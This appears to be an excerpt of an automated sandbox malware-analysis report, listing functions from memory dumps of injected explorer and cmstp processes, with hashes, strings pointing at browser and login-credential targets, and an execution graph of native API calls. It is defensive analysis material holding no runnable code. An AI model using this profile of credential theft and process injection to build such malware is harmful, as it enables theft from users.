                                          Function 08181FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$chro$hild$me_c
                                          • API String ID: 0-3136806129
                                          • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                          • Instruction ID: 3a7c183923d69018530598deb4d878fe3e1b17e544012770a7080c03f052fd63
                                          • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                          • Instruction Fuzzy Hash: 55318D74118B088FCB85FF689496BAAB7E1FF98201F84067DA84ACB354DF30C545CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08181FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$chro$hild$me_c
                                          • API String ID: 0-3136806129
                                          • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                          • Instruction ID: fe46b7427882d6a4cccab6cc1659376379688b98e9780bc72bfc1d77dcacf3f6
                                          • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                          • Instruction Fuzzy Hash: 79318B70218B088FCB94FF689496BAAB7E1FF98201F84062D984ACB354DF30C545CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 081848C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 0-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: 14256a8ed512b7dfc244d730e1ff96a7f51ca185cf71bc8aeff483706660977a
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction Fuzzy Hash: 6C31C071A14A1C8BCB14FFA8C8857EDB7E0FF58216F40022AD45EE7340DF7486458B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 081848BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 0-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 86bdb83429548ab2c5ef49cd4b7ce8e8fc994eb98f6682f18d7eb97453c24262
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: 4821CE70A14A1DCBCB15FFA8C8867EDBBE0FF58216F40422AD45AE7340DF7486458B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08185E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$l$l$t
                                          • API String ID: 0-168566397
                                          • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                          • Instruction ID: e9b13b8872a3495cfab195c8ee2a45ca6ce266553e92c7cebb83090362d89f3d
                                          • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                          • Instruction Fuzzy Hash: 95215774A28A0D9BDB48FFA8C0457AEBAF1FF18315F50462E9009E3710DB7895918B84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08185E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$l$l$t
                                          • API String ID: 0-168566397
                                          • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                          • Instruction ID: 0055344a4a0c6b7a0d64bb941385cec269ebf7e1cd8742f88de9a1f73b832a2d
                                          • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                          • Instruction Fuzzy Hash: 24215774A28A0D9BDB08FFA8C0457EABAF1FF18315F50462ED009E3700DB7895518B84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 08185FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: auth$logi$pass$user
                                          • API String ID: 0-2393853802
                                          • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                          • Instruction ID: 90f0cf2dd1ead5be9368696938ce8c046047b176cf2cf44f747e5e1327e7cfc0
                                          • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                          • Instruction Fuzzy Hash: 4021C030618B0D8BCB05EF9998856EEB7E2EF88354F044619E40AEB344D7B4E9158BC6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2%
                                          Dynamic/Decrypted Code Coverage:1.7%
                                          Signature Coverage:0%
                                          Total number of Nodes:591
                                          Total number of Limit Nodes:72
                                          execution_graph 82995 af09d 82998 ab990 82995->82998 82999 ab9b6 82998->82999 83006 99d30 82999->83006 83001 ab9c2 83002 ab9e6 83001->83002 83014 98f30 83001->83014 83052 aa670 83002->83052 83009 99d3d 83006->83009 83055 99c80 83006->83055 83008 99d44 83008->83001 83009->83008 83067 99c20 83009->83067 83015 98f57 83014->83015 83481 9b1b0 83015->83481 83017 98f69 83485 9af00 83017->83485 83019 98f86 83026 98f8d 83019->83026 83556 9ae30 LdrLoadDll 83019->83556 83022 98ffc 83501 9f400 83022->83501 83024 99006 83025 abf50 2 API calls 83024->83025 83048 990f2 83024->83048 83027 9902a 83025->83027 83026->83048 83489 9f370 83026->83489 83028 abf50 2 API calls 83027->83028 83029 9903b 83028->83029 83030 abf50 2 API calls 83029->83030 83031 9904c 83030->83031 83513 9ca80 83031->83513 83033 99059 83034 a4a40 8 API calls 83033->83034 83035 99066 83034->83035 83036 a4a40 8 API calls 83035->83036 83037 99077 83036->83037 83038 990a5 83037->83038 83039 99084 83037->83039 83040 a4a40 8 API calls 83038->83040 83523 9d610 83039->83523 83042 990c1 83040->83042 83051 990e9 83042->83051 83557 9d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83042->83557 83045 99092 83539 98d00 83045->83539 83046 98d00 23 API calls 83046->83048 83048->83002 83051->83046 83053 aaf20 LdrLoadDll 83052->83053 83054 aa68f 83053->83054 83056 99c93 83055->83056 83106 a8b80 LdrLoadDll 83055->83106 83086 a8a30 83056->83086 83059 99ca6 83059->83009 83060 99c9c 83060->83059 83089 ab270 83060->83089 83062 99ce3 83062->83059 83100 99aa0 83062->83100 83064 99d03 83107 99620 LdrLoadDll 83064->83107 83066 99d15 83066->83009 83068 99c3a 83067->83068 83069 ab560 LdrLoadDll 83067->83069 83455 ab560 83068->83455 83069->83068 83072 ab560 LdrLoadDll 83073 99c61 83072->83073 83074 9f170 83073->83074 83075 9f189 83074->83075 83464 9b030 83075->83464 83077 9f19c 83468 aa1a0 83077->83468 83080 99d55 83080->83001 83082 9f1c2 83083 9f1ed 83082->83083 83474 aa220 83082->83474 83085 aa450 2 API calls 83083->83085 83085->83080 83108 aa5c0 83086->83108 83090 ab289 83089->83090 83121 a4a40 83090->83121 83092 ab2a1 83093 ab2aa 83092->83093 83160 ab0b0 83092->83160 83093->83062 83095 ab2be 83095->83093 83178 a9ec0 83095->83178 83433 97ea0 83100->83433 83102 99ac1 83102->83064 83103 99aba 83103->83102 83446 98160 83103->83446 83106->83056 83107->83066 83111 aaf20 83108->83111 83110 a8a45 83110->83060 83112 aaf30 83111->83112 83114 aaf52 83111->83114 83115 a4e40 83112->83115 83114->83110 83116 a4e5a 83115->83116 83117 a4e4e 83115->83117 83116->83114 83117->83116 83120 a52c0 LdrLoadDll 83117->83120 83119 a4fac 83119->83114 83120->83119 83122 a4a54 83121->83122 83123 a4d75 83121->83123 83122->83123 83186 a9c10 83122->83186 83123->83092 83126 a4b63 83246 aa420 LdrLoadDll 83126->83246 83127 a4b80 83189 aa320 83127->83189 83130 a4b6d 83130->83092 83131 a4ba7 83132 abd80 2 API calls 83131->83132 83134 a4bb3 83132->83134 83133 a4d39 83136 aa450 2 API calls 83133->83136 83134->83130 83134->83133 83135 a4d4f 83134->83135 83140 a4c42 83134->83140 83255 a4780 LdrLoadDll NtReadFile NtClose 83135->83255 83137 a4d40 83136->83137 83137->83092 83139 a4d62 83139->83092 83141 a4ca9 83140->83141 83143 a4c51 83140->83143 83141->83133 83142 a4cbc 83141->83142 83248 aa2a0 83142->83248 83145 a4c6a 83143->83145 83146 a4c56 83143->83146 83148 a4c6f 83145->83148 83149 a4c87 83145->83149 83247 a4640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 83146->83247 83192 a46e0 83148->83192 83149->83137 83204 a4400 83149->83204 83151 a4c60 83151->83092 83154 a4d1c 83252 aa450 83154->83252 83155 a4c7d 83155->83092 83158 a4c9f 83158->83092 83159 a4d28 83159->83092 83161 ab0c1 83160->83161 83162 ab0d3 83161->83162 83274 abd00 83161->83274 83162->83095 83164 ab0f4 83277 a4060 83164->83277 83166 ab140 83166->83095 83167 ab117 83167->83166 83168 a4060 3 API calls 83167->83168 83169 ab139 83168->83169 83169->83166 83308 a5380 83169->83308 83171 ab1ca 83172 ab1da 83171->83172 83402 aaec0 LdrLoadDll 83171->83402 83318 aad30 83172->83318 83175 ab208 83397 a9e80 83175->83397 83179 a9edc 83178->83179 83180 aaf20 LdrLoadDll 83178->83180 83429 1ebfae8 LdrInitializeThunk 83179->83429 83180->83179 83181 a9ef7 83183 abd80 83181->83183 83184 ab319 83183->83184 83430 aa630 83183->83430 83184->83062 83187 a4b34 83186->83187 83188 aaf20 LdrLoadDll 83186->83188 83187->83126 83187->83127 83187->83130 83188->83187 83190 aaf20 LdrLoadDll 83189->83190 83191 aa33c NtCreateFile 83190->83191 83191->83131 83193 a46fc 83192->83193 83194 aa2a0 LdrLoadDll 83193->83194 83195 a471d 83194->83195 83196 a4738 83195->83196 83197 a4724 83195->83197 83199 aa450 2 API calls 83196->83199 83198 aa450 2 API calls 83197->83198 83200 a472d 83198->83200 83201 a4741 83199->83201 83200->83155 83256 abf90 LdrLoadDll RtlAllocateHeap 83201->83256 83203 a474c 83203->83155 83205 a444b 83204->83205 83206 a447e 83204->83206 83207 aa2a0 LdrLoadDll 83205->83207 83208 a45c9 83206->83208 83211 a449a 83206->83211 83209 a4466 83207->83209 83210 aa2a0 LdrLoadDll 83208->83210 83212 aa450 2 API calls 83209->83212 83216 a45e4 83210->83216 83213 aa2a0 LdrLoadDll 83211->83213 83214 a446f 83212->83214 83215 a44b5 83213->83215 83214->83158 83218 a44bc 83215->83218 83219 a44d1 83215->83219 83270 aa2e0 LdrLoadDll 83216->83270 83221 aa450 2 API calls 83218->83221 83222 a44ec 83219->83222 83223 a44d6 83219->83223 83220 a461e 83224 aa450 2 API calls 83220->83224 83225 a44c5 83221->83225 83231 a44f1 83222->83231 83257 abf50 83222->83257 83226 aa450 2 API calls 83223->83226 83227 a4629 83224->83227 83225->83158 83228 a44df 83226->83228 83227->83158 83228->83158 83240 a4503 83231->83240 83260 aa3d0 83231->83260 83232 a4557 83233 a456e 83232->83233 83269 aa260 LdrLoadDll 83232->83269 83235 a458a 83233->83235 83236 a4575 83233->83236 83237 aa450 2 API calls 83235->83237 83238 aa450 2 API calls 83236->83238 83239 a4593 83237->83239 83238->83240 83241 a45bf 83239->83241 83264 abb50 83239->83264 83240->83158 83241->83158 83243 a45aa 83244 abd80 2 API calls 83243->83244 83245 a45b3 83244->83245 83245->83158 83246->83130 83247->83151 83249 aaf20 LdrLoadDll 83248->83249 83250 a4d04 83249->83250 83251 aa2e0 LdrLoadDll 83250->83251 83251->83154 83253 aa46c NtClose 83252->83253 83254 aaf20 LdrLoadDll 83252->83254 83253->83159 83254->83253 83255->83139 83256->83203 83259 abf68 83257->83259 83271 aa5f0 83257->83271 83259->83231 83261 aa3da 83260->83261 83262 aaf20 LdrLoadDll 83261->83262 83263 aa3ec NtReadFile 83262->83263 83263->83232 83265 abb5d 83264->83265 83266 abb74 83264->83266 83265->83266 83267 abf50 2 API calls 83265->83267 83266->83243 83268 abb8b 83267->83268 83268->83243 83269->83233 83270->83220 83272 aaf20 LdrLoadDll 83271->83272 83273 aa60c RtlAllocateHeap 83272->83273 83273->83259 83275 abd2d 83274->83275 83403 aa500 83274->83403 83275->83164 83278 a4063 83277->83278 83307 a4071 83278->83307 83406 acef0 83278->83406 83280 a40cd 83281 acef0 2 API calls 83280->83281 83284 a40d8 83281->83284 83282 a4126 83285 acef0 2 API calls 83282->83285 83284->83282 83286 ad020 3 API calls 83284->83286 83421 acf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 83284->83421 83288 a413a 83285->83288 83286->83284 83287 a4197 83289 acef0 2 API calls 83287->83289 83288->83287 83411 ad020 83288->83411 83291 a41ad 83289->83291 83292 a41ea 83291->83292 83295 ad020 3 API calls 83291->83295 83293 acef0 2 API calls 83292->83293 83294 a41f5 83293->83294 83296 ad020 3 API calls 83294->83296 83302 a422f 83294->83302 83295->83291 83296->83294 83299 acf50 2 API calls 83300 a432e 83299->83300 83301 acf50 2 API calls 83300->83301 83303 a4338 83301->83303 83417 acf50 83302->83417 83304 acf50 2 API calls 83303->83304 83305 a4342 83304->83305 83306 acf50 2 API calls 83305->83306 83306->83307 83307->83167 83309 a5391 83308->83309 83310 a4a40 8 API calls 83309->83310 83311 a53a7 83310->83311 83312 a53e2 83311->83312 83313 a53f5 83311->83313 83317 a53fa 83311->83317 83314 abd80 2 API calls 83312->83314 83315 abd80 2 API calls 83313->83315 83316 a53e7 83314->83316 83315->83317 83316->83171 83317->83171 83319 aad44 83318->83319 83320 aabf0 LdrLoadDll 83318->83320 83422 aabf0 83319->83422 83320->83319 83323 aabf0 LdrLoadDll 83324 aad56 83323->83324 83325 aabf0 LdrLoadDll 83324->83325 83326 aad5f 83325->83326 83327 aabf0 LdrLoadDll 83326->83327 83328 aad68 83327->83328 83329 aabf0 LdrLoadDll 83328->83329 83330 aad71 83329->83330 83331 aabf0 LdrLoadDll 83330->83331 83332 aad7d 83331->83332 83333 aabf0 LdrLoadDll 83332->83333 83334 aad86 83333->83334 83335 aabf0 LdrLoadDll 83334->83335 83336 aad8f 83335->83336 83337 aabf0 LdrLoadDll 83336->83337 83338 aad98 83337->83338 83339 aabf0 LdrLoadDll 83338->83339 83340 aada1 83339->83340 83341 aabf0 LdrLoadDll 83340->83341 83342 aadaa 83341->83342 83343 aabf0 LdrLoadDll 83342->83343 83344 aadb6 83343->83344 83345 aabf0 LdrLoadDll 83344->83345 83346 aadbf 83345->83346 83347 aabf0 LdrLoadDll 83346->83347 83348 aadc8 83347->83348 83349 aabf0 LdrLoadDll 83348->83349 83350 aadd1 83349->83350 83351 aabf0 LdrLoadDll 83350->83351 83352 aadda 83351->83352 83353 aabf0 LdrLoadDll 83352->83353 83354 aade3 83353->83354 83355 aabf0 LdrLoadDll 83354->83355 83356 aadef 83355->83356 83357 aabf0 LdrLoadDll 83356->83357 83358 aadf8 83357->83358 83359 aabf0 LdrLoadDll 83358->83359 83360 aae01 83359->83360 83361 aabf0 LdrLoadDll 83360->83361 83362 aae0a 83361->83362 83363 aabf0 LdrLoadDll 83362->83363 83364 aae13 83363->83364 83365 aabf0 LdrLoadDll 83364->83365 83366 aae1c 83365->83366 83367 aabf0 LdrLoadDll 83366->83367 83368 aae28 83367->83368 83369 aabf0 LdrLoadDll 83368->83369 83370 aae31 83369->83370 83371 aabf0 LdrLoadDll 83370->83371 83372 aae3a 83371->83372 83373 aabf0 LdrLoadDll 83372->83373 83374 aae43 83373->83374 83375 aabf0 LdrLoadDll 83374->83375 83376 aae4c 83375->83376 83377 aabf0 LdrLoadDll 83376->83377 83378 aae55 83377->83378 83379 aabf0 LdrLoadDll 83378->83379 83380 aae61 83379->83380 83381 aabf0 LdrLoadDll 83380->83381 83382 aae6a 83381->83382 83383 aabf0 LdrLoadDll 83382->83383 83384 aae73 83383->83384 83385 aabf0 LdrLoadDll 83384->83385 83386 aae7c 83385->83386 83387 aabf0 LdrLoadDll 83386->83387 83388 aae85 83387->83388 83389 aabf0 LdrLoadDll 83388->83389 83390 aae8e 83389->83390 83391 aabf0 LdrLoadDll 83390->83391 83392 aae9a 83391->83392 83393 aabf0 LdrLoadDll 83392->83393 83394 aaea3 83393->83394 83395 aabf0 LdrLoadDll 83394->83395 83396 aaeac 83395->83396 83396->83175 83398 aaf20 LdrLoadDll 83397->83398 83399 a9e9c 83398->83399 83428 1ebfdc0 LdrInitializeThunk 83399->83428 83400 a9eb3 83400->83095 83402->83172 83404 aaf20 LdrLoadDll 83403->83404 83405 aa51c NtAllocateVirtualMemory 83404->83405 83405->83275 83407 acf00 83406->83407 83408 acf06 83406->83408 83407->83280 83409 abf50 2 API calls 83408->83409 83410 acf2c 83409->83410 83410->83280 83412 acf90 83411->83412 83413 abf50 2 API calls 83412->83413 83416 acfed 83412->83416 83414 acfca 83413->83414 83415 abd80 2 API calls 83414->83415 83415->83416 83416->83288 83418 acf56 83417->83418 83419 abd80 2 API calls 83418->83419 83420 a4324 83419->83420 83420->83299 83421->83284 83423 aac0b 83422->83423 83424 a4e40 LdrLoadDll 83423->83424 83425 aac2b 83424->83425 83426 a4e40 LdrLoadDll 83425->83426 83427 aacd7 83425->83427 83426->83427 83427->83323 83428->83400 83429->83181 83431 aaf20 LdrLoadDll 83430->83431 83432 aa64c RtlFreeHeap 83431->83432 83432->83184 83434 97eab 83433->83434 83435 97eb0 83433->83435 83434->83103 83436 abd00 2 API calls 83435->83436 83442 97ed5 83436->83442 83437 97f38 83437->83103 83438 a9e80 2 API calls 83438->83442 83439 97f3e 83441 97f64 83439->83441 83443 aa580 2 API calls 83439->83443 83441->83103 83442->83437 83442->83438 83442->83439 83445 abd00 2 API calls 83442->83445 83449 aa580 83442->83449 83444 97f55 83443->83444 83444->83103 83445->83442 83447 9817e 83446->83447 83448 aa580 2 API calls 83446->83448 83447->83064 83448->83447 83450 aa59c 83449->83450 83451 aaf20 LdrLoadDll 83449->83451 83454 1ebfb68 LdrInitializeThunk 83450->83454 83451->83450 83452 aa5b3 83452->83442 83454->83452 83456 ab583 83455->83456 83459 9ace0 83456->83459 83458 99c4b 83458->83072 83461 9ad04 83459->83461 83460 9ad0b 83460->83458 83461->83460 83462 9ad40 LdrLoadDll 83461->83462 83463 9ad57 83461->83463 83462->83463 83463->83458 83465 9b053 83464->83465 83467 9b0d0 83465->83467 83479 a9c50 LdrLoadDll 83465->83479 83467->83077 83469 aaf20 LdrLoadDll 83468->83469 83470 9f1ab 83469->83470 83470->83080 83471 aa790 83470->83471 83472 aaf20 LdrLoadDll 83471->83472 83473 aa7af LookupPrivilegeValueW 83472->83473 83473->83082 83475 aaf20 LdrLoadDll 83474->83475 83476 aa23c 83475->83476 83480 1ebfed0 LdrInitializeThunk 83476->83480 83477 aa25b 83477->83083 83479->83467 83480->83477 83482 9b1e0 83481->83482 83483 9b030 LdrLoadDll 83482->83483 83484 9b1f4 83483->83484 83484->83017 83486 9af24 83485->83486 83558 a9c50 LdrLoadDll 83486->83558 83488 9af5e 83488->83019 83490 9f39c 83489->83490 83491 9b1b0 LdrLoadDll 83490->83491 83492 9f3ae 83491->83492 83559 9f280 83492->83559 83495 9f3c9 83498 9f3d4 83495->83498 83499 aa450 2 API calls 83495->83499 83496 9f3e1 83497 9f3f2 83496->83497 83500 aa450 2 API calls 83496->83500 83497->83022 83498->83022 83499->83498 83500->83497 83502 9f42c 83501->83502 83578 9b2a0 83502->83578 83504 9f43e 83505 9f280 3 API calls 83504->83505 83506 9f44f 83505->83506 83507 9f459 83506->83507 83509 9f471 83506->83509 83508 aa450 2 API calls 83507->83508 83510 9f464 83507->83510 83508->83510 83511 aa450 2 API calls 83509->83511 83512 9f482 83509->83512 83510->83024 83511->83512 83512->83024 83514 9ca96 83513->83514 83515 9caa0 83513->83515 83514->83033 83516 9af00 LdrLoadDll 83515->83516 83517 9cb3e 83516->83517 83518 9cb64 83517->83518 83519 9b030 LdrLoadDll 83517->83519 83518->83033 83520 9cb80 83519->83520 83521 a4a40 8 API calls 83520->83521 83522 9cbd5 83521->83522 83522->83033 83524 9d636 83523->83524 83525 9b030 LdrLoadDll 83524->83525 83526 9d64a 83525->83526 83582 9d300 83526->83582 83528 9908b 83529 9cbf0 83528->83529 83530 9cc16 83529->83530 83531 9b030 LdrLoadDll 83530->83531 83532 9cc99 83530->83532 83531->83532 83533 9b030 LdrLoadDll 83532->83533 83534 9cd06 83533->83534 83535 9af00 LdrLoadDll 83534->83535 83536 9cd6f 83535->83536 83537 9b030 LdrLoadDll 83536->83537 83538 9ce1f 83537->83538 83538->83045 83542 98d14 83539->83542 83611 9f6c0 83539->83611 83541 98f25 83541->83002 83542->83541 83616 a4390 83542->83616 83544 98d70 83544->83541 83619 98ab0 83544->83619 83547 acef0 2 API calls 83548 98db2 83547->83548 83549 ad020 3 API calls 83548->83549 83554 98dc7 83549->83554 83550 97ea0 4 API calls 83550->83554 83553 9c7a0 18 API calls 83553->83554 83554->83541 83554->83550 83554->83553 83555 98160 2 API calls 83554->83555 83624 9f660 83554->83624 83628 9f070 21 API calls 83554->83628 83555->83554 83556->83026 83557->83051 83558->83488 83560 9f29a 83559->83560 83568 9f350 83559->83568 83561 9b030 LdrLoadDll 83560->83561 83562 9f2bc 83561->83562 83569 a9f00 83562->83569 83564 9f2fe 83572 a9f40 83564->83572 83567 aa450 2 API calls 83567->83568 83568->83495 83568->83496 83570 a9f1c 83569->83570 83571 aaf20 LdrLoadDll 83569->83571 83570->83564 83571->83570 83573 a9f5c 83572->83573 83574 aaf20 LdrLoadDll 83572->83574 83577 1ec07ac LdrInitializeThunk 83573->83577 83574->83573 83575 9f344 83575->83567 83577->83575 83579 9b2c7 83578->83579 83580 9b030 LdrLoadDll 83579->83580 83581 9b303 83580->83581 83581->83504 83583 9d317 83582->83583 83591 9f700 83583->83591 83585 9d35f 83599 aa6a0 83585->83599 83587 9d38b 83588 9d392 83587->83588 83602 aa260 LdrLoadDll 83587->83602 83588->83528 83590 9d3a5 83590->83528 83592 9f725 83591->83592 83603 981a0 83592->83603 83594 9f749 83594->83585 83595 9f83e 83594->83595 83596 a4a40 8 API calls 83594->83596 83598 abd80 2 API calls 83594->83598 83610 9f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 83594->83610 83595->83585 83596->83594 83598->83594 83600 aa6bf CreateProcessInternalW 83599->83600 83601 aaf20 LdrLoadDll 83599->83601 83600->83587 83601->83600 83602->83590 83604 9829f 83603->83604 83605 981b5 83603->83605 83604->83594 83605->83604 83606 a4a40 8 API calls 83605->83606 83607 98222 83606->83607 83608 abd80 2 API calls 83607->83608 83609 98249 83607->83609 83608->83609 83609->83594 83610->83594 83612 a4e40 LdrLoadDll 83611->83612 83613 9f6df 83612->83613 83614 9f6ed 83613->83614 83615 9f6e6 SetErrorMode 83613->83615 83614->83542 83615->83614 83618 a43b6 83616->83618 83629 9f490 83616->83629 83618->83544 83620 abd00 2 API calls 83619->83620 83622 98ad5 83620->83622 83621 98cea 83621->83547 83622->83621 83649 a9840 83622->83649 83625 9f673 83624->83625 83697 a9e50 83625->83697 83628->83554 83630 9f4ad 83629->83630 83636 a9f80 83630->83636 83633 9f4f5 83633->83618 83637 a9f86 83636->83637 83638 aaf20 LdrLoadDll 83637->83638 83639 a9f9c 83638->83639 83647 1ebffb4 LdrInitializeThunk 83639->83647 83640 9f4ee 83640->83633 83642 a9fd0 83640->83642 83643 aaf20 LdrLoadDll 83642->83643 83644 a9fec 83643->83644 83648 1ebfc60 LdrInitializeThunk 83644->83648 83645 9f51e 83645->83618 83647->83640 83648->83645 83650 abf50 2 API calls 83649->83650 83651 a9857 83650->83651 83670 99310 83651->83670 83653 a9872 83654 a9899 83653->83654 83655 a98b0 83653->83655 83656 abd80 2 API calls 83654->83656 83658 abd00 2 API calls 83655->83658 83657 a98a6 83656->83657 83657->83621 83659 a98ea 83658->83659 83660 abd00 2 API calls 83659->83660 83661 a9903 83660->83661 83667 a9ba4 83661->83667 83676 abd40 LdrLoadDll 83661->83676 83663 a9b89 83664 a9b90 83663->83664 83663->83667 83665 abd80 2 API calls 83664->83665 83666 a9b9a 83665->83666 83666->83621 83668 abd80 2 API calls 83667->83668 83669 a9bf9 83668->83669 83669->83621 83671 99335 83670->83671 83672 9ace0 LdrLoadDll 83671->83672 83673 99368 83672->83673 83675 9938d 83673->83675 83677 9cf10 83673->83677 83675->83653 83676->83663 83678 9cf3c 83677->83678 83679 aa1a0 LdrLoadDll 83678->83679 83680 9cf55 83679->83680 83681 9cf5c 83680->83681 83688 aa1e0 83680->83688 83681->83675 83685 9cf97 83686 aa450 2 API calls 83685->83686 83687 9cfba 83686->83687 83687->83675 83689 aa1fc 83688->83689 83690 aaf20 LdrLoadDll 83688->83690 83696 1ebfbb8 LdrInitializeThunk 83689->83696 83690->83689 83691 9cf7f 83691->83681 83693 aa7d0 83691->83693 83694 aaf20 LdrLoadDll 83693->83694 83695 aa7ef 83694->83695 83695->83685 83696->83691 83698 aaf20 LdrLoadDll 83697->83698 83699 a9e6c 83698->83699 83702 1ebfd8c LdrInitializeThunk 83699->83702 83700 9f69e 83700->83554 83702->83700 83704 a9040 83705 abd00 2 API calls 83704->83705 83707 a907b 83705->83707 83706 a915c 83707->83706 83708 9ace0 LdrLoadDll 83707->83708 83709 a90b1 83708->83709 83710 a4e40 LdrLoadDll 83709->83710 83712 a90cd 83710->83712 83711 a90e0 Sleep 83711->83712 83712->83706 83712->83711 83715 a8c60 LdrLoadDll 83712->83715 83716 a8e70 LdrLoadDll 83712->83716 83715->83712 83716->83712 83719 1ebf900 LdrInitializeThunk

                                          Executed Functions

                                          Function 000AA320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 288 aa320-aa371 call aaf20 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA36D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: 475b9485cd9734b1bc41fdf535602a367b285c484343e64533211baa3957841c
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: C1F0BDB2200208AFCB48CF88DC85EEB77ADAF8C754F158248BA0D97241D630E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA3D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
